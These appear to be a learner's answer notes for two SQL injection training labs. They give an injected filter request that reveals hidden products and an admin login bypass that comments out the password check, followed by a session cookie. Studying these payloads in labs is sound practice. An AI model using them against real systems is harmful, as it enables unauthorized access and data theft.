Lab1.Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
______________________________________________________________________________________
SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Ans :" GET /filter?category='+or+1%3d1-- HTTP/2 "
SELECT * FROM products WHERE category = 'Gifts' or 1=1 --

______________________________________________________________________________________
Lab2 : Lab: SQL injection vulnerability allowing login bypass
       select user from users where username='admin' and password='xyzz';

Ans :  select user from users where username='admin' -- ;
       Set-Cookie: session=97DAaA1HHJNKuXkRqL6HoyyNuaDbeHj1; 